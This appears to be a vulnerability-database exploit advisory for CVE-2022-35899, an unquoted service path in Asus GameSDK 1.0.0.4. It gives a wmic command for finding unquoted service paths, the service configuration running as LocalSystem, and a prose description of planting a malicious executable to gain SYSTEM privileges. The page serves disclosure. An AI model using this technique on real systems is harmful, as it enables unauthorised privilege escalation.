Asus GameSDK 1.0.0.4 Unquoted Service Path

2022.07.20

Credit: Angelo Pio Amirante

Risk: Medium

Local: Yes

Remote: No

CVE: CVE-2022-35899

CWE: N/A

# Exploit Title: Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path (Privilege Escalation)
# Date: 07/14/2022
# Exploit Author: Angelo Pio Amirante
# Version: 1.0.0.4
# Tested on: Windows 10
# Patched version: 1.0.5.0
# CVE: CVE-2022-35899
# Step to discover the unquoted service path:
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
# Info on the service:
C:\>sc qc "GameSDK Service"
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
NOME_SERVIZIO: GameSDK Service
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 1 NORMAL
NOME_PERCORSO_BINARIO : C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe
GRUPPO_ORDINE_CARICAMENTO :
TAG : 0
NOME_VISUALIZZATO : GameSDK Service
DIPENDENZE :
SERVICE_START_NAME : LocalSystem
# Exploit
If an attacker had already compromised the system and the current user has the privileges to write in the "C:\Program Files (x86)\ASUS\" folder or in "C:\" , he could place his own "Program.exe" or "GameSDK.exe" files respectively, and when the service starts, it would launch the malicious file, rather than the original "GameSDK.exe".
# Impact
An attacker can elevate his privileges on the system and become NTAUTHORITY\SYSTEM.
# Poc Video
https://youtu.be/u_8JMIgn-5g

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Asus GameSDK 1.0.0.4 Unquoted Service Path

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.